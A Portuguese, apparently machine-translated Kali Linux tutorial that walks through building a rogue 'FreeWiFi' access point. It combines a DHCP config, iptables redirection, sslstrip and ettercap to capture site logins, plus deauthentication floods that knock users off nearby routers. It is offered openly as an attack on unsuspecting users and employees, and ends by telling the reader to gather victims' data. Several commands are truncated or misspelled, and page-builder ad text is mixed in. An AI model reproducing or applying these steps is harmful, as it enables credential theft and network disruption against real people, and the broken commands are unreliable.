Você está na página 1de 4

Menu Crie um Site Grátis Fantástico CLIQUE AQUI

Liga Brasileira d
entidade de administr
shuai jião, hung gar, w

Kali Linux Tutorial: Criando manualmente um AP


falsificado para capturar site Logins

Nós vamos ser a criação de um ponto de acesso falso onde estaremos tirando a criptografia de sites usando HTTPS para
HTTP para que possamos pegar as entradas dos campos username e password. Nós também estaremos enviando pacotes
deauthentication para todos os outros roteadores nas proximidades tornando-os inúteis e forçar o usuário para fazer login no
nosso ponto de acesso malicioso. Isso pode ser facilmente usado para ataques conhecidos como "ataques charco", onde
atacam uma empresa onde os funcionários nem sequer percebem que eles estão em um ponto de acesso malicioso porque
automaticamente conectado à um malicioso devido aos outros sendo desligamento.

Nota: Sim, eu percebo alguns sites estão utilizando TLS, por isso não vai ser capaz de capturar os logins desses sites,
infelizmente, como o mecanismo de criptografia não será descriptografado. (se você sabe uma maneira de retirar a
encriptação, por favor me diga!)

Requisitos e Lab:

Um adaptador de rede que suporta o modo de injeção de pacote, o modo de monitor e master.
A exposição ao ambiente Linux e uma quantidade razoável de experiência penetração wireless, Leia este tutorial: Kali
Linux Tutorial: Auditoria sem fio com Aircrack-ng, Reaver, e Pixiewps
Um cérebro funcional que pode processar informações.
Leia também: passos fáceis para criar Web Testing Lab Penetração em Kali Linux

Passo 1: Obtenha nosso gateway padrão


Abra o terminal de Kali e Linux Você pode fazer isso digitando:
Menu Crie um Site Grátis Fantástico CLIQUE AQUI

Código: [Select]
route -n

Sob onde diz "Gateway", você vai precisar para memorizá-la ou escrevê-lo como nós vamos precisar usá-lo quando
estabelecemos as nossas tabelas de IP mais tarde.
Passo 2: Agora vamos instalar dhcp3-server Em primeiro lugar, se você não tiver feito isso,
digite:

Código: [Select]
apt-get dist-upgrade

Quando isso é feito, agora vamos instalar o servidor DHCP, digitando:

Código: [Select]
apt-get install dhcp3-server

Agora, quando se faz a instalação, é preciso configurar o servidor DHCP, digitando:

Código: [Select]
nano /etc/dhcpd.conf

Agora, copie e cole o seguinte em:

Código: [Select]
Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}

A única coisa que você precisa entender aqui é a linha de nome de domínio Opção, onde diz "FreeWiFi", você pode mudar
isso para o que você quiser chamar seu falso (e mal-intencionado) ponto de acesso. Para este tutorial, eu vou mantê-lo
como FreeWiFi.
Agora, apenas a ressalva de que, digitando CTRL + X e Y, em seguida, em seguida, digite.
Passo 3: Agora vamos começar modo de monitor
Para começar o modo monitor, tipo:

Código: [Select]
airmon-ng start

Então, para tentar evitar quaisquer problemas, digite:

Código: [Select]
airmon-ng check kill

Passo 4: Comece o ponto de acesso falso


Agora que você tem modo monitor tudo pronto, agora vamos começar o ponto de acesso falso:

Código: [Select]
airbase-ng -c 11 -e
Agora que você começou a AP falso, no entanto, se você tentar acessá-lo, você não será capaz de fazer. Lembre-se de não
Menu Crie um Site Grátis Fantástico CLIQUE AQUI
fechar esse terminal como você precisa estar on-line.
Passo 5: Agora vamos definir as regras de mesa IP
Há um monte de comandos aqui, então eu sugiro a criação de um shell script, e isso é como fazê-lo, primeiro tipo:

Código: [Select]
nano iptables.sh

Agora supondo que você tenha conhecimentos básicos de networking, eu suponho que você vai ler sobre isso e configurar
manualmente algumas delas como alguns pode não funcionar para você.

Código: [Select]
#!/bin/sh
clear
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –t nat –A PREROUTNG –p udp –j DNAT –to
iptables –P FORWARD ACCEPT
iptables --append FORWARD –-in-interface at0 –j ACCEPT
iptables --table nat -append POSTROUTING --out-interface eth0 –j MASQUERADE
iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 10000

Em seguida, dar-lhe permissões, digitando:

Código: [Select]
chmod +x iptables.sh

Em seguida, basta executá-lo digitando:

Código: [Select]
./iptables.sh

Passo 6: Iniciar o servidor DHCP


Para fazer isso, basta digitar:
Código: [Select]
dhcpd –cf /etc/dhcpd.conf –pf /var/run/dhcpd.pid at0

Em seguida, para iniciá-lo, digite:


Código: [Select]
/etc/init.d/isc-dhcp-server start

Passo 7: A partir sslstrip e Ettercap


Eu sugiro que você leia o meu tutorial anterior sobre Ettercap: Homem no meio ataque Usando Ettercap Em Kali Linux
Eu suponho que você sabe o que essas duas ferramentas estão fazendo, então vamos começar de iniciando sslstrip:
Código: [Select]
sslstrip –f –p –k 10000

Deixe que o terminal aberto. Então, para começar a ettercap, digite:


Código: [Select]
ettercap –p –u –T –q –I at0

Passo 8: Envio de pacotes deauth para todos os outros roteadores


Em primeiro lugar, começar a digitalizar para os roteadores, digitando:
Código: [Select]
airodump-ng

Em seguida, selecione o seu alvo e anote o seu número de canal (s) e BSSID (s). Em seguida, defina os canais, digitando:

Código: [Select]
iwconfig
Menu channel
Crie um Site Grátis Fantástico CLIQUE AQUI
Agora, para começar o ataque deauthentication, digite o seguinte comando:

Código: [Select]
aireplay-ng -0 5000 -a --ignore-negative-one

Parabéns, você está feito, agora é só sentar e esperar que os usuários façam login e reunir seus dados.

Criar um Site Grátis Incrível - Criar uma Loja online Grátis - Descubra como Criar um Site Grátis
- Criar uma Loja Virtual Grátis

Você também pode gostar